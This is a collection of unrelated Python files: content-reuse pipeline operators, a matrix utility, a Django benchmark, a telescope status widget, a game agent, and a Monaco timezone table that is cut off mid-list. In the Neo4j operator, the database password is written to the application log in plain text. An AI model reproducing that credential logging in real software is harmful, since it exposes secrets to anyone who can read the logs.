raise Exception("Base data file does not exist")
except KeyError:
raise Exception("Column names are invalid")
stb_df = base_df[['STB_Id', 'STB_Grade', 'STB_Section', 'STB_Text', 'Ref_id']]
stb_df.columns = ['identifier', 'grade', 'section', 'text', 'identifier_ref_']
stb_df['text'] = stb_df['text'].apply(listify)
stb_df.dropna(axis=0, subset=['text'], inplace=True)
ref_df = base_df[['Ref_id', 'Ref_Grade', 'Ref_Section', 'Ref_Text']]
ref_df.columns = ['identifier', 'grade', 'section', 'text']
ref_df['text'] = ref_df['text'].apply(listify)
ref_df.dropna(axis=0, subset=['text'], inplace=True)
stb_df = modify_df(stb_df, sentence_length)
ref_df = modify_df(ref_df, sentence_length)
cos_sim_df = generate_cosine_similarity_score(stb_df, ref_df, path_to_result_folder)
append_cosine_similarity_score(stb_df, ref_df, cos_sim_df, path_to_result_folder, cosine_score_threshold)
self.outputs["path_to_cosine_similarity_matrix"].write(os.path.join(path_to_result_folder,
'cosine_similarity.pkl'))
self.outputs["path_to_complete_data_set"].write(os.path.join(path_to_result_folder, 'complete_data_set.csv'))
class DataPreparationV2(BaseOperator):
@property
def inputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_base_data_file: path to base data file
"""
return {
"path_to_stb_data": File_IO(self.node.inputs[0]),
"path_to_ref_data": File_IO(self.node.inputs[1]),
"path_to_result_folder": File_IO(self.node.inputs[2])
}
@property
def outputs(self):
"""
Function that the ScoringDataPreparation operator defines while returning graph outputs
:return: Returns the path to the cosine similarity pickle and complete data set
"""
return {
"path_to_cosine_similarity_matrix": File_IO(self.node.outputs[0]),
"path_to_complete_data_set": File_IO(self.node.outputs[1])
}
def run(self, sentence_length, cosine_score_threshold):
"""
Generate data for the purpose of scoring
:param sentence_length: filter data on minimum number of sentences per topic
:param cosine_score_threshold: threshold to filter cosine similarity score on
:return: None
"""
path_to_stb_data = self.inputs["path_to_stb_data"].read()
path_to_ref_data = self.inputs["path_to_ref_data"].read()
path_to_result_folder = self.inputs["path_to_result_folder"].read()
node_name = 'data_preparation'
path_to_result_folder = os.path.join(path_to_result_folder, node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
assert os.path.exists(path_to_stb_data)
assert os.path.exists(path_to_ref_data)
try:
stb_df = pd.read_csv(path_to_stb_data)[['Identifier', 'topic_text']]
stb_df = stb_df.dropna()
stb_df.columns = ['identifier', 'text']
stb_df['text'] = stb_df['text'].apply(lambda x: x.replace('\n', ' ').split('. '))
ref_df = pd.read_csv(path_to_ref_data)[
['Concept id', 'Type of match', 'fulltext_annotation_target']].fillna(
{'fulltext_annotation_target': ''})
ref_df = ref_df[ref_df['Type of match'] == 'Complete']
ref_df.drop('Type of match', axis=1, inplace=True)
ref_df = ref_df.groupby('Concept id')['fulltext_annotation_target'].apply(
lambda x: '. '.join(x)).reset_index()
ref_df.columns = ['identifier', 'text']
ref_df['text'] = ref_df['text'].apply(lambda x: x.replace('\n', ' ').split('. '))
ref_df = ref_df[ref_df['text'] != '']
except FileNotFoundError:
raise Exception("Base data file does not exist")
except KeyError:
raise Exception("Column names are invalid")
stb_df = modify_df(stb_df, sentence_length)
ref_df = modify_df(ref_df, sentence_length)
cos_sim_df = generate_cosine_similarity_score(stb_df, ref_df, path_to_result_folder)
append_cosine_similarity_score(stb_df, ref_df, cos_sim_df, path_to_result_folder, cosine_score_threshold)
self.outputs["path_to_cosine_similarity_matrix"].write(os.path.join(path_to_result_folder,
'cosine_similarity.pkl'))
self.outputs["path_to_complete_data_set"].write(os.path.join(path_to_result_folder, 'complete_data_set.csv'))
class BertScoring(BaseOperator):
@property
def inputs(self):
"""
Function that the BERTScoring operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_result_folder: path to result folder
path_to_reference_DTB: path to reference DTB
"""
return {
"path_to_scoring_data": File_IO(self.node.inputs[0]),
"path_to_trained_model": ReadDaggitTask_Folderpath(self.node.inputs[1]),
"path_to_pickled_tokenizer": File_IO(self.node.inputs[2]),
"path_to_siamese_config": File_IO(self.node.inputs[3])
}
@property
def outputs(self):
"""
Function that the BERTScoring operator defines while returning graph outputs
:returns: Returns the path to the mapping json file
"""
return {"path_to_predicted_output": File_Txt(
self.node.outputs[0])}
def run(self, filter_by_type_of_match, filter_by_grade_range_, threshold, embedding_method):
path_to_scoring_data = self.inputs["path_to_scoring_data"].read()
node_name = 'bert_scoring'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_scoring_data)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
path_to_best_model = self.inputs["path_to_trained_model"].read_loc()
path_to_pickled_tokenizer = self.inputs["path_to_pickled_tokenizer"].read()
path_to_siamese_config = self.inputs["path_to_siamese_config"].read()
test_df = pd.read_csv(path_to_scoring_data)
test_df.fillna({'sentence1': '', 'sentence2': ''}, inplace=True)
if "Unnamed: 0" in test_df.columns:
del test_df["Unnamed: 0"]
# filtering the test dataset based on grade range: +2/-2
if filter_by_grade_range_ != "nan":
grade_range = 2
test_df = filter_by_grade_range(test_df, grade_range)
# filtering based on type of match
if filter_by_type_of_match != "nan":
test_df = test_df[test_df["type_of_match"] == filter_by_type_of_match].copy()
test_df = test_df.reset_index(drop=True)
# if model not present terminate the process:
assert os.path.exists(path_to_result_folder)
assert os.path.exists(path_to_best_model)
assert os.path.exists(path_to_pickled_tokenizer)
# loading tokenizer:
with open(path_to_pickled_tokenizer, 'rb') as tokenizer_file:
tokenizer = pickle.load(tokenizer_file)
with open(path_to_siamese_config, "rb") as json_file:
siamese_config = json.load(json_file)
# invoke the scoring module:
output_pred_df = scoring_module(tokenizer, path_to_best_model, siamese_config, test_df, threshold)
path_to_save_output = os.path.join(path_to_result_folder, "output_{0}.csv").format(embedding_method)
output_pred_df.to_csv(path_to_save_output, index=False)
self.outputs["path_to_predicted_output"].write(path_to_save_output)
class TopicLevelAggregation(BaseOperator):
@property
def inputs(self):
"""
Function that the TopicLevelAggregation operator defines while returning graph inputs
:returns: Inputs to the node of the Content Reuse graph
path_to_predicted_output: path to the output csv with predicted score
"""
return {
"path_to_predicted_output": File_Txt(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the TopicLevelAggregation operator defines while returning graph outputs
:returns: Returns the path to the csv with aggregated score for each topic pair
path_to_output_topic_agg: path to the csv with aggregated score for each topic pair
"""
return {"path_to_output_topic_agg": File_IO(
self.node.outputs[0])}
def run(self, aggregation_criteria, compute_topic_similarity, mandatory_column_names, data_labeled):
path_to_predicted_output = self.inputs["path_to_predicted_output"].read()
node_name = 'topic_level_aggregation'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_predicted_output)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
assert os.path.exists(path_to_predicted_output)
output_pred_df = pd.read_csv(path_to_predicted_output)
if "Unnamed: 0" in output_pred_df.columns:
del output_pred_df["Unnamed: 0"]
# Topic similarity aggregation computation:
if compute_topic_similarity:
path_to_save_output = os.path.join(path_to_result_folder, "agg_topic_level_output.csv")
output_aggregated_topic_level = aggregation_topic_level(output_pred_df, aggregation_criteria,
mandatory_column_names, data_labeled)
output_aggregated_topic_level.to_csv(path_to_save_output)
else:
path_to_save_output = path_to_predicted_output
self.outputs["path_to_output_topic_agg"].write(path_to_save_output)
class ContentReuseEvaluation(BaseOperator):
@property
def inputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_full_score_metrics_file: path to scored dataframe file
"""
return {
"path_to_output_topic_agg": File_IO(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph outputs
:return: Returns the path to the k_eval_metrics
"""
return {
"path_to_k_eval_metrics": File_IO(self.node.outputs[0])
}
def run(self, window):
"""
Generate k evaluation metrics
:param window: length of k eval metrics window
:return: None
"""
path_to_output_topic_agg = self.inputs["path_to_output_topic_agg"].read()
node_name = 'evaluation'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_output_topic_agg)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
full_score_df = pd.read_csv(path_to_output_topic_agg)
k_result_df = k_topic_recommendation(full_score_df, window)
k_1 = k_result_df["k=1"].mean()
k_2 = k_result_df["k=2"].mean()
k_3 = k_result_df["k=3"].mean()
k_4 = k_result_df["k=4"].mean()
k_5 = k_result_df["k=5"].mean()
eval_dict = {"k=1": k_1, "k=2": k_2, "k=3": k_3, "k=4": k_4, "k=5": k_5}
with open(os.path.join(path_to_result_folder, 'k_eval_metrics.json'), 'w') as f:
json.dump(eval_dict, f)
self.outputs["path_to_k_eval_metrics"].write(os.path.join(path_to_result_folder, 'k_eval_metrics.json'))
class RecommendKConceptsPerTopic(BaseOperator):
@property
def inputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_full_score_metrics_file: path to scored dataframe file
"""
return {
"path_to_output_topic_agg": File_IO(self.node.inputs[0])
}
@property
def outputs(self):
"""
Function that the ContentReuseEvaluation operator defines while returning graph outputs
:return: Returns the path to the k_eval_metrics
"""
return {
"path_to_dtb_mapping_file": File_IO(self.node.outputs[0])
}
def run(self, window):
"""
Generate k evaluation metrics
:param window: length of k eval metrics window
:return: None
"""
path_to_output_topic_agg = self.inputs["path_to_output_topic_agg"].read()
node_name = 'recommend_k_concepts_per_topic'
path_to_result_folder = os.path.join(os.path.dirname(os.path.dirname(path_to_output_topic_agg)), node_name)
if not os.path.exists(path_to_result_folder):
os.mkdir(path_to_result_folder)
df = pd.read_csv(path_to_output_topic_agg)[['stb_id', 'ref_id', 'pred_score_mean']]
df.sort_values(['stb_id', 'pred_score_mean'], ascending=False, inplace=True)
output = {}
for id_ in df.stb_id.unique():
temp = df[df['stb_id'] == id_].head(window).set_index('ref_id').drop('stb_id', axis=1)
output[id_] = [{ind: row['pred_score_mean']} for ind, row in temp.iterrows()]
with open(os.path.join(path_to_result_folder, 'dtb_mapping.json'), 'w') as f:
json.dump(output, f)
self.outputs["path_to_dtb_mapping_file"].write(os.path.join(path_to_result_folder, 'dtb_mapping.json'))
class WriteRelationshipsToNeo4j(BaseOperator):
@property
def inputs(self):
"""
Function that the WriteRelationshipsToNeo4j operator defines while returning graph inputs
:return: Inputs to the node of the Content Reuse graph
path_to_configuration_file: path to configuration file
path_to_dtb_mapping_file: path to dtb mapping file
"""
return {
"path_to_configuration_file": File_IO(self.node.inputs[0]),
"path_to_dtb_mapping_file": File_IO(self.node.inputs[1])
}
@property
def outputs(self):
"""
Function that the WriteRelationshipsToNeo4j operator defines while returning graph outputs
:return: Outputs to the node of the Content Reuse graph
"""
return None
def run(self):
"""
Create a connection to Graph DB and ingest DTB Mapping relations to it
"""
path_to_credentials = self.inputs["path_to_configuration_file"].read()
path_to_dtb_mapping = self.inputs["path_to_dtb_mapping_file"].read()
config = configparser.ConfigParser(allow_no_value=True)
config.read(path_to_credentials)
try:
scheme = ast.literal_eval(config["graph"]["scheme"])
host = ast.literal_eval(config["graph"]["host"])
port = ast.literal_eval(config["graph"]["port"])
user = ast.literal_eval(config["graph"]["user"])
password = ast.literal_eval(config["graph"]["password"])
max_connections = ast.literal_eval(config["graph"]["max_connections"])
secure = ast.literal_eval(config["graph"]["secure"])
start_node_label = ast.literal_eval(config["relationship"]["start_node_label"])
end_node_label = ast.literal_eval(config["relationship"]["end_node_label"])
relationship_label = ast.literal_eval(config["relationship"]["relationship_label"])
relationship_properties = ast.literal_eval(config["relationship"]["relationship_properties"])
logging.info(str([scheme, host, port, user, password, max_connections, secure, start_node_label,
end_node_label, relationship_label, relationship_properties]))
graph = connect_to_graph(scheme, host, port, user, password, max_connections, secure)
with open(path_to_dtb_mapping, 'r') as f:
dtb_mapping = json.load(f)
create_node_relationships(graph, dtb_mapping, start_node_label, end_node_label, relationship_label,
relationship_properties)
except KeyError as ke:
logging.error("Key Error found", ke.args, ke.__str__())
|
"""
A small module to find the nearest positive definite matrix.
"""
# Copyright (c) Andrew R. McCluskey and Benjamin J. Morgan
# Distributed under the terms of the MIT License
# author: Andrew R. McCluskey (arm61)
import warnings
import numpy as np
def find_nearest_positive_definite(matrix: np.ndarray) -> np.ndarray:
"""
Find the nearest positive-definite matrix to that given, using the method from N.J. Higham, "Computing a nearest
symmetric positive semidefinite matrix" (1988): 10.1016/0024-3795(88)90223-6
:param matrix: Matrix to find nearest positive-definite for.
:return: Nearest positive-definite matrix.
"""
if check_positive_definite(matrix):
return matrix
warnings.warn("The estimated covariance matrix was not positive definite, the nearest positive "
"definite matrix has been found and will be used.")
B = (matrix + matrix.T) / 2
_, s, V = np.linalg.svd(B)
H = np.dot(V.T, np.dot(np.diag(s), V))
A2 = (B + H) / 2
A3 = (A2 + A2.T) / 2
if check_positive_definite(A3):
return A3
spacing = np.spacing(np.linalg.norm(matrix))
eye = np.eye(matrix.shape[0])
k = 1
while not check_positive_definite(A3):
mineig = np.min(np.real(np.linalg.eigvals(A3)))
A3 += eye * (-mineig * k**2 + spacing)
k += 1
return A3
def check_positive_definite(matrix: np.ndarray) -> bool:
"""
Checks if a matrix is positive-definite via Cholesky decomposition.
:param matrix: Matrix to check.
:return: True for a positive-definite matrix.
"""
try:
_ = np.linalg.cholesky(matrix)
return True
except np.linalg.LinAlgError:
return False
|
from time import time
from tables.check.base import CheckBase
from tables.models import SimpleTable
class CheckBulkUpdate(CheckBase):
name = 'bulk_update'
graph_title = 'Bulk update'
def check_rows(self, rows):
SimpleTable.objects.all().delete()
values = (SimpleTable(name='testname') for _ in range(rows))
SimpleTable.objects.bulk_create(values)
start_time = time()
SimpleTable.objects.all().update(name='newname')
time_taken = time() - start_time
return time_taken
|
#!/usr/bin/env python
"""Displays coordinate system, object net position,
and rotation type and angle.
History:
2003-03-26 ROwen Modified to use the tcc model.
2003-03-31 ROwen Switched from RO.Wdg.LabelledWdg to RO.Wdg.Gridder
2003-05-28 ROwen Modified to use RO.CoordSys.
2003-06-09 Rowen Removed dispatcher arg.
2003-06-11 ROwen Modified to use new tccModel objSys.
2003-06-12 ROwen Added helpText entries.
2003-06-18 ROwen Bug fix: pos1 not shown in hours when wanted (introduced 2003-06-11).
2003-06-19 ROwen Improved helpText for coordinate system, rotator angle and rotator position.
2003-06-25 ROwen Modified test case to handle message data as a dict
2003-12-03 ROwen Made object name longer (to match slew input widget).
2004-02-04 ROwen Modified _HelpURL to match minor help reorg.
2009-03-31 ROwen Updated for new TCC model.
2009-07-19 ROwen Modified to work with new KeyVar and the way it handles PVTs.
2010-03-12 ROwen Changed to use Models.getModel.
2010-03-19 ROwen Simplified help URLs to all point to the same section.
2015-11-03 ROwen Replace "== None" with "is None" and "!= None" with "is not None" to modernize the code.
"""
import Tkinter
import RO.CnvUtil
import RO.CoordSys
import RO.StringUtil
import RO.Wdg
import TUI.Models
_HelpURL = "Telescope/StatusWin.html#NetPos"
_CoordSysHelpDict = {
RO.CoordSys.ICRS: u"ICRS mean RA/Dec: the current standard (\N{ALMOST EQUAL TO}FK5 J2000)",
RO.CoordSys.FK5: "FK5 mean RA/Dec: the IAU 1976 standard",
RO.CoordSys.FK4: "FK4 mean RA/Dec: an old standard",
RO.CoordSys.Galactic: "Galactic long/lat: the IAU 1958 standard",
RO.CoordSys.Geocentric: "Current apparent geocentric RA/Dec",
RO.CoordSys.Topocentric: "Current apparent topocentric az/alt; no refraction corr.",
RO.CoordSys.Observed: "Observed az/alt: topocentric plus refraction correction",
RO.CoordSys.Physical: "Physical az/alt; pos. of a perfect telescope",
RO.CoordSys.Mount: "Mount az/alt: pos. sent to the axis controllers; no wrap",
}
_RotTypeHelpDict = {
"object": "Rotating with the object",
"horizon": "Rotating with the horizon",
"mount": "Rotating with respect to the rotator mount",
"none": "Rotator left where it is",
}
_RotPosHelpDict = {
"object": "Angle of object with respect to the instrument",
"horizon": "Angle of az/alt with respect to the instrument",
"mount": "Angle sent to the rotator controller",
}
class NetPosWdg (Tkinter.Frame):
def __init__ (self, master=None, **kargs):
"""creates a new telescope position position frame
Inputs:
- master master Tk widget -- typically a frame or window
"""
Tkinter.Frame.__init__(self, master, **kargs)
self.tccModel = TUI.Models.getModel("tcc")
gr = RO.Wdg.Gridder(self, sticky="w")
# object name
# self.objNameWdg = RO.Wdg.StrLabel(
# master = self,
# width = 25,
# anchor = "w",
# helpText = "Object name",
# helpURL = _HelpURL,
# )
# gr.gridWdg (
# label = "Name",
# dataWdg = self.objNameWdg,
# colSpan = 3,
# )
# self.tccModel.objName.addValueCallback(self.objNameWdg.set)
# object net position
self.netPos1Wdg = gr.gridWdg(
label = "",
dataWdg = RO.Wdg.DMSLabel(
master = self,
precision = 2,
width = 13,
helpText = "Net object position, including object offset",
helpURL = _HelpURL,
),
units = "",
)
self.netPos2Wdg = gr.gridWdg (
label = "",
dataWdg = RO.Wdg.DMSLabel(
master = self,
precision = 2,
width = 13,
helpText = "Net object position, including object offset",
helpURL = _HelpURL,
),
units = RO.StringUtil.DMSStr,
)
self.tccModel.objNetPos.addValueListCallback((self.netPos1Wdg.dataWdg.set, self.netPos2Wdg.dataWdg.set),
cnvFunc=RO.CnvUtil.posFromPVT)
# coordinate system
self.csysWdg = RO.Wdg.StrLabel(
master = self,
width = 13,
anchor = "w",
helpText = "Object coordinate system",
helpURL = _HelpURL,
)
gr.gridWdg (
label = "CSys",
dataWdg = self.csysWdg,
colSpan = 2
)
self.tccModel.objSys.addCallback(self._objSysCallback)
# rotation angle and type
# rotFrame = Tkinter.Frame(self)
# self.rotPosWdg = RO.Wdg.FloatLabel(
# master = rotFrame,
# precision = 2,
# width = 8,
# helpText = "Rotator angle (see full help for more info)",
# helpURL = _HelpURL,
# )
# self.rotPosWdg.pack(side="left")
# rotUnitsLabel = Tkinter.Label(rotFrame, text=RO.StringUtil.DegStr)
# rotUnitsLabel.pack(side="left")
# self.rotTypeWdg = RO.Wdg.StrLabel(
# master = rotFrame,
# width = 8,
# anchor = "w",
# helpURL = _HelpURL,
# )
# self.rotTypeWdg.pack(side="left")
# gr.gridWdg (
# label = "Rot",
# dataWdg = rotFrame,
# colSpan = 2,
# )
# self.tccModel.rotType.addValueCallback(self.rotTypeWdg.set)
# self.tccModel.rotType.addCallback(self._rotTypeCallback)
# self.tccModel.rotPos.addValueCallback(self.rotPosWdg.set, cnvFunc=RO.CnvUtil.posFromPVT)
# allow the last column to grow to fill the available space
# self.columnconfigure(3, weight=1)
def _objSysCallback(self, keyVar):
"""sets the coordinate system
"""
# print "TUI.TCC.StatusWdg.NetPosWdg._objSysCallback%r" % ((csysObjAndDate, isCurrent),)
isCurrent = keyVar.isCurrent
csysObj = self.tccModel.csysObj
csysDate = keyVar[1]
csysValid = str(csysObj).lower() != "unknown"
dateValid = csysDate is not None
if not csysValid:
self.setNoCoordSys()
return
if csysObj.dateIsYears():
if not dateValid:
csysStr = "%s ?EPOCH?" % (csysObj,)
elif csysDate != 0.0 or csysObj.hasEquinox():
csysStr = "%s %s%.1f" % (csysObj, csysObj.datePrefix(), csysDate)
else:
csysStr = str(csysObj)
elif csysObj.dateIsSidTime():
# typically the default date (<0 => now) is used
# but local apparent sidereal time may be specified
if not dateValid:
csysStr = "%s ?ST?" % (csysObj,)
elif csysDate < 0.0:
csysStr = str(csysObj)
else:
dateHMS = RO.StringUtil.dmsStrFromDeg(csysDate, precision=0)
csysStr = "%s %s hms" % (csysObj, dateHMS)
else:
# no date
csysStr = str(csysObj)
self.csysWdg.set(csysStr, isCurrent=isCurrent)
posLabels = csysObj.posLabels()
self.netPos1Wdg.labelWdg["text"] = posLabels[0]
self.netPos2Wdg.labelWdg["text"] = posLabels[1]
self.setPos1InHrs(csysObj.eqInHours())
self.csysWdg.helpText = _CoordSysHelpDict.get(csysObj.name(), "Coordinate system")
def _rotTypeCallback(self, keyVar):
rotType = keyVar[0]
if rotType:
rotType = rotType.lower()
self.rotTypeWdg.helpText = _RotTypeHelpDict.get(rotType, "Type of rotation")
self.rotPosWdg.helpText = _RotPosHelpDict.get(rotType, "Angle of rotation")
def setNoCoordSys(self):
"""Call if coordinate system invalid or unknown"""
self.csysWdg.set(None, isCurrent = False)
self.netPos1Wdg.labelWdg["text"] = "RA"
self.netPos2Wdg.labelWdg["text"] = "Dec"
self.setPos1InHrs(True)
def setPos1InHrs(self, pos1InHrs):
if pos1InHrs:
self.netPos1Wdg.dataWdg.setCvtDegToHrs(True)
self.netPos1Wdg.unitsWdg["text"] = "hms"
else:
self.netPos1Wdg.dataWdg.setCvtDegToHrs(None)
self.netPos1Wdg.unitsWdg["text"] = RO.StringUtil.DMSStr
if __name__ == "__main__":
import TestData
tuiModel = TestData.tuiModel
testFrame = NetPosWdg(tuiModel.tkRoot)
testFrame.pack()
dataList = (
"ObjName='test object with a long name'",
"ObjSys=ICRS, 0",
"ObjNetPos=120.123450, 0.000000, 4494436859.66000, -2.345670, 0.000000, 4494436859.66000",
"RotType=Obj",
"RotPos=3.456789, 0.000000, 4494436895.07921",
)
TestData.testDispatcher.dispatch(dataList)
tuiModel.reactor.run()
|
from connect_four.agents.agent import Agent
class Human(Agent):
def action(self, env, last_action=None):
return int(input("requesting action: "))
|
'''tzinfo timezone information for Europe/Monaco.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Monaco(DstTzInfo):
'''Europe/Monaco timezone definition. See datetime.tzinfo for details'''
zone = 'Europe/Monaco'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1911,3,10,23,50,39),
d(1916,6,14,23,0,0),
d(1916,10,1,23,0,0),
d(1917,3,24,23,0,0),
d(1917,10,7,23,0,0),
d(1918,3,9,23,0,0),
d(1918,10,6,23,0,0),
d(1919,3,1,23,0,0),
d(1919,10,5,23,0,0),
d(1920,2,14,23,0,0),
d(1920,10,23,23,0,0),
d(1921,3,14,23,0,0),
d(1921,10,25,23,0,0),
d(1922,3,25,23,0,0),
d(1922,10,7,23,0,0),
d(1923,5,26,23,0,0),
d(1923,10,6,23,0,0),
d(1924,3,29,23,0,0),
d(1924,10,4,23,0,0),
d(1925,4,4,23,0,0),
d(1925,10,3,23,0,0),
d(1926,4,17,23,0,0),
d(1926,10,2,23,0,0),
d(1927,4,9,23,0,0),
d(1927,10,1,23,0,0),
d(1928,4,14,23,0,0),
d(1928,10,6,23,0,0),
d(1929,4,20,23,0,0),
d(1929,10,5,23,0,0),
d(1930,4,12,23,0,0),
d(1930,10,4,23,0,0),
d(1931,4,18,23,0,0),
d(1931,10,3,23,0,0),
d(1932,4,2,23,0,0),
d(1932,10,1,23,0,0),
d(1933,3,25,23,0,0),
d(1933,10,7,23,0,0),
d(1934,4,7,23,0,0),
d(1934,10,6,23,0,0),
d(1935,3,30,23,0,0),
d(1935,10,5,23,0,0),
d(1936,4,18,23,0,0),
d(1936,10,3,23,0,0),
d(1937,4,3,23,0,0),
d(1937,10,2,23,0,0),
d(1938,3,26,23,0,0),
d(1938,10,1,23,0,0),
d(1939,4,15,23,0,0),
d(1939,11,18,23,0,0),
d(1940,2,25,2,0,0),
d(1941,5,4,23,0,0),
d(1941,10,5,22,0,0),
d(1942,3,8,23,0,0),
d(1942,11,2,1,0,0),
d(1943,3,29,1,0,0),
d(1943,10,4,1,0,0),
d(1944,4,3,1,0,0),
d(1944,10,7,23,0,0),
d(1945,4,2,1,0,0),
d(1945,9,16,1,0,0),
d(1976,3,28,0,0,0),
d(1976,9,25,23,0,0),
d(1977,4,3,1,0,0),
d(1977,9,25,1,0,0),
d(1978,4,2,1,0,0),
d(1978,10,1,1,0,0),
d(1979,4,1,1,0,0),
d(1979,9,30,1,0,0),
d(1980,4,6,1,0,0),
d(1980,9,28,1,0,0),
d(1981,3,29,1,0,0),
d(1981,9,27,1,0,0),
d(1982,3,28,1,0,0),
d(1982,9,26,1,0,0),
d(1983,3,27,1,0,0),
d(1983,9,25,1,0,0),
d(1984,3,25,1,0,0),
d(1984,9,30,1,0,0),
d(1985,3,31,1,0,0),
d(1985,9,29,1,0,0),
d(1986,3,30,1,0,0),
d(1986,9,28,1,0,0),
d(1987,3,29,1,0,0),
d(1987,9,27,1,0,0),
d(1988,3,27,1,0,0),
d(1988,9,25,1,0,0),
d(1989,3,26,1,0,0),
d(1989,9,24,1,0,0),
d(1990,3,25,1,0,0),
d(1990,9,30,1,0,0),
d(1991,3,31,1,0,0),
d(1991,9,29,1,0,0),
d(1992,3,29,1,0,0),
d(1992,9,27,1,0,0),
d(1993,3,28,1,0,0),
d(1993,9,26,1,0,0),
d(1994,3,27,1,0,0),
d(1994,9,25,1,0,0),
d(1995,3,26,1,0,0),
d(1995,9,24,1,0,0),
d(1996,3,31,1,0,0),
d(1996,10,27,1,0,0),
d(1997,3,30,1,0,0),
d(1997,10,26,1,0,0),
d(1998,3,29,1,0,0),
d(1998,10,25,1,0,0),
d(1999,3,28,1,0,0),
d(1999,10,31,1,0,0),
d(2000,3,26,1,0,0),
d(2000,10,29,1,0,0),
d(2001,3,25,1,0,0),
d(2001,10,28,1,0,0),
d(2002,3,31,1,0,0),
d(2002,10,27,1,0,0),
d(2003,3,30,1,0,0),
d(2003,10,26,1,0,0),
d(2004,3,28,1,0,0),
d(2004,10,31,1,0,0),
d(2005,3,27,1,0,0),
d(2005,10,30,1,0,0),
d(2006,3,26,1,0,0),
d(2006,10,29,1,0,0),
d(2007,3,25,1,0,0),
d(2007,10,28,1,0,0),
d(2008,3,30,1,0,0),
d(2008,10,26,1,0,0),
d(2009,3,29,1,0,0),
d(2009,10,25,1,0,0),
d(2010,3,28,1,0,0),
d(2010,10,31,1,0,0),
d(2011,3,27,1,0,0),
d(2011,10,30,1,0,0),
d(2012,3,25,1,0,0),
d(2012,10,28,1,0,0),
d(2013,3,31,1,0,0),
d(2013,10,27,1,0,0),
d(2014,3,30,1,0,0),
d(2014,10,26,1,0,0),
d(2015,3,29,1,0,0),
d(2015,10,25,1,0,0),
d(2016,3,27,1,0,0),
d(2016,10,30,1,0,0),
d(2017,3,26,1,0,0),
d(2017,10,29,1,0,0),
d(2018,3,25,1,0,0),
d(2018,10,28,1,0,0),
d(2019,3,31,1,0,0),
d(2019,10,27,1,0,0),
d(2020,3,29,1,0,0),
d(2020,10,25,1,0,0),
d(2021,3,28,1,0,0),
d(2021,10,31,1,0,0),
d(2022,3,27,1,0,0),
d(2022,10,30,1,0,0),
d(2023,3,26,1,0,0),
d(2023,10,29,1,0,0),
d(2024,3,31,1,0,0),
d(2024,10,27,1,0,0),
d(2025,3,30,1,0,0),
d(2025,10,26,1,0,0),
d(2026,3,29,1,0,0),
d(2026,10,25,1,0,0),
d(2027,3,28,1,0,0),
d(2027,10,31,1,0,0),
d(2028,3,26,1,0,0),
d(2028,10,29,1,0,0),
d(2029,3,25,1,0,0),
d(2029,10,28,1,0,0),
d(2030,3,31,1,0,0),
d(2030,10,27,1,0,0),
d(2031,3,30,1,0,0),
d(2031,10,26,1,0,0),
d(2032,3,28,1,0,0),
d(2032,10,31,1,0,0),
d(2033,3,27,1,0,0),
d(2033,10,30,1,0,0),
d(2034,3,26,1,0,0),
d(2034,10,29,1,0,0),
d(2035,3,25,1,0,0),
d(2035,10,28,1,0,0),
d(2036,3,30,1,0,0),
d(2036,10,26,1,0,0),
d(2037,3,29,1,0,0),
d(2037,10,25,1,0,0),
]
_transition_info = [
i(540,0,'PMT'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(0,0,'WET'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,3600,'WEST'),
i(7200,7200,'WEMT'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
i(7200,3600,'CEST'),
i(3600,0,'CET'),
